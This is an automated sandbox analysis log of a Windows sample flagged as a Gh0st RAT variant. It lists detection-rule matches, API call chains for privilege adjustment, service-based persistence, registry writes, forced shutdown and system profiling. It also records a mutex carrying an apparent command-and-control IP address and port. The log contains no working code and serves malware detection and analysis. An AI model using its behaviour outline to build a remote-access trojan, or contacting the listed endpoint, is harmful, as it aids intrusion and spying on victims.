                Source: 00000005.00000002.2945751366.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: 00000004.00000002.2903752097.0000000000401000.00000040.00000001.01000000.00000003.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 1476, type: MEMORYSTR | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 4068, type: MEMORYSTR | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: Process Memory Space: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe PID: 6208, type: MEMORYSTR | Matched rule: Windows_Trojan_Gh0st_ee6de6bc reference_sample = ea1dc816dfc87c2340a8b8a77a4f97618bccf19ad3b006dce4994be02e13245d, os = windows, severity = x86, description = Identifies a variant of Gh0st Rat, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Gh0st, fingerprint = 3c529043f34ad8a8692b051ad7c03206ce1aafc3a0eb8fcf7f5bcfdcb8c1b455, id = ee6de6bc-1648-4a77-9607-e2a211c7bda4, last_modified = 2021-08-23
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                Source: classification engine | Classification label: mal100.bank.troj.spyw.evad.winEXE@3/1@0/2
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_00410AA0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, | 0_2_00410AA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit, | 0_2_0040954F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10008A54 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, | 0_2_10008A54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit, | 0_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_00410AA0 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, | 4_2_00410AA0
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_0040954F memcpy,CreateFileA,WriteFile,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit, | 4_2_0040954F
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_10008A54 GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,CloseHandle, | 4_2_10008A54
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 4_2_10001503 memcpy,CreateFileA,DeviceIoControl,DeviceIoControl,WriteFile,DeviceIoControl,CloseHandle,Sleep,GetVersion,GetCurrentProcess,OpenProcessToken,LookupPrivilegeValueA,AdjustTokenPrivileges,ExitWindowsEx,exit, | 4_2_10001503
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: 0_2_0040FC42 memset,memset,getsockname,memcpy,memcpy,GetVersionExA,RegOpenKeyA,RegQueryValueExA,RegCloseKey,GlobalMemoryStatusEx,GetDriveTypeA,GetDiskFreeSpaceExA,memset,GetLastInputInfo,GetTickCount, | 0_2_0040FC42
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA, | 0_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe | Code function: wsprintfA,GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,strcat,strcat,CopyFileA,memset,strcpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,strcpy,strcat,RegOpenKeyA,lstrlenA,RegSetValueExA, | 0_2_10009A83
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA,4_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: wsprintfA,GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,strcat,strcat,CopyFileA,memset,strcpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,strcpy,strcat,RegOpenKeyA,lstrlenA,RegSetValueExA,4_2_10009A83
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_100073C4 lstrcpyA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,CreateToolhelp32Snapshot,strstr,lstrcatA,Process32First,lstrcmpiA,Process32Next,lstrcatA,lstrcatA,strstr,CloseHandle,lstrlenA,lstrcpyA,FreeLibrary,0_2_100073C4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_00411ACF GetModuleFileNameA,ExpandEnvironmentStringsA,strlen,strncmp,wsprintfA,strlen,strlen,_mbscat,_mbscat,CopyFileA,memset,_mbscpy,SetFileAttributesA,OpenSCManagerA,CreateServiceA,LockServiceDatabase,ChangeServiceConfig2A,ChangeServiceConfig2A,UnlockServiceDatabase,GetLastError,OpenServiceA,StartServiceA,StartServiceA,_mbscpy,_mbscat,RegOpenKeyA,lstrlen,RegSetValueExA,0_2_00411ACF
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 0_2_100095A4 fuckyou,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,wsprintfA,wsprintfA,GetVersionExA,GetVersionExA,GetVersionExA,CreateThread,Sleep,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,strlen,strlen,strcat,strcat,GetModuleFileNameA,CopyFileA,Sleep,ExitProcess,CreateThread,wsprintfA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,sprintf,lstrlenA,wsprintfA,memset,GetModuleFileNameA,SHGetSpecialFolderPathA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,MoveFileA,memset,GetModuleFileNameA,Sleep,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,0_2_100095A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeCode function: 4_2_100095A4 fuckyou,GetInputState,GetCurrentThreadId,PostThreadMessageA,GetMessageA,wsprintfA,wsprintfA,GetVersionExA,GetVersionExA,GetVersionExA,CreateThread,Sleep,Sleep,Sleep,StartServiceCtrlDispatcherA,StartServiceCtrlDispatcherA,Sleep,StartServiceCtrlDispatcherA,ExpandEnvironmentStringsA,wsprintfA,strlen,strlen,strcat,strcat,GetModuleFileNameA,CopyFileA,Sleep,ExitProcess,CreateThread,wsprintfA,GetModuleFileNameA,CopyFileA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,Sleep,sprintf,lstrlenA,wsprintfA,memset,GetModuleFileNameA,SHGetSpecialFolderPathA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,MoveFileA,memset,GetModuleFileNameA,Sleep,Sleep,WaitForSingleObject,CloseHandle,Sleep,WaitForSingleObject,CloseHandle,4_2_100095A4
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeMutant created: \Sessions\1\BaseNamedObjects\110.40.45.163:70:Rsjshd fzfgkqcm
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile read: C:\Program Files\desktop.iniJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                Source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeReversingLabs: Detection: 65%
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeFile read: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeJump to behavior
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                Source: unknownProcess created: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe "C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe"
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: apphelp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mfc42.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: napinsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: pnrpnsp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wshbth.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: nlaapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: dnsapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winrnr.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: fwpuclnt.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: rasadhlp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: devenum.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winmm.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ntmarta.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: devobj.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: msasn1.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: msdmo.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: avicap32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: msvfw32.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mfc42.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iphlpapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mfc42.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: urlmon.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: iertutil.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: srvcli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: netutils.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: kernel.appcore.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: uxtheme.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wininet.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: sspicli.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: windows.storage.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: wldp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: profapi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winhttp.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: mswsock.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: winnsi.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeSection loaded: propsys.dllJump to behavior
                Source: C:\Users\user\Desktop\SecuriteInfo.com.Win32.RATX-gen.32303.15212.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                Source: Binary string: iphlpapi.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wkernel32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2223717486.0000000000A03000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520956038.00000000022EC000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2909171827.00000000023C2000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2686941457.00000000006E9000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946450413.000000000233F000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2762218547.0000000002218000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: advapi32.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.0000000002600000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.00000000024F0000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.0000000002590000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: iphlpapi.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521297160.000000000267C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2910146848.000000000256B000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946770671.000000000260B000.00000040.00000800.00020000.00000000.sdmp
                Source: Binary string: wkernelbase.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521410677.000000000282E000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2197052330.0000000002604000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2913041831.0000000002A8D000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2660700372.0000000002861000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946883460.00000000027B9000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2739388386.0000000002592000.00000004.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdbUGP source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2160765089.0000000002264000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521144245.000000000244C000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
                Source: Binary string: wntdll.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912424952.00000000026AB000.00000040.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2609394899.00000000024F1000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2701196874.0000000002213000.00000004.00000020.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2946604927.00000000023E0000.00000040.00000020.00020000.00000000.sdmp
                Source: Binary string: wuser32.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4521558288.0000000002A5C000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000003.2261759713.0000000002609000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000003.2720432186.00000000024F2000.00000004.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2912752894.0000000002860000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2947054584.00000000029ED000.00000040.00000800.00020000.00000000.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000003.2799524772.0000000002597000.00000004.00000800.00020000.00000000.sdmp
                Source: Binary string: \Server\Release\Xy.pdb source: SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000000.00000002.4520202775.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000004.00000002.2903752097.000000000041F000.00000040.00000001.01000000.00000003.sdmp, SecuriteInfo.com.Win32.RATX-gen.32303.15212.exe, 00000005.00000002.2945751366.000000000041F000.00000040.00000001.01000000.00000003.sdmp
